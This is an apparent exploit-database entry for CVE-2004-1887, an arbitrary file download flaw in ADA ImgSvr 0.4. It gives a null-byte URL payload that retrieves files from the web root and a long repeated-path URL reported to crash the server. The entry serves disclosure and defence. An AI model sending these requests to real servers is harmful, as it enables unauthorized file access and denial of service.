ADA IMGSVR 0.4 - Arbitrary File Download

Author: Donato Ferrante
type: remote
platform: windows
port: 
date_added: 2004-04-01 
date_updated: 2016-11-03 
verified: 1 
codes: CVE-2004-1887;OSVDB-4830 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/10027/info

A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.

An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory.

http://www.example.org:1234/someDirectory/fileName%00

The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/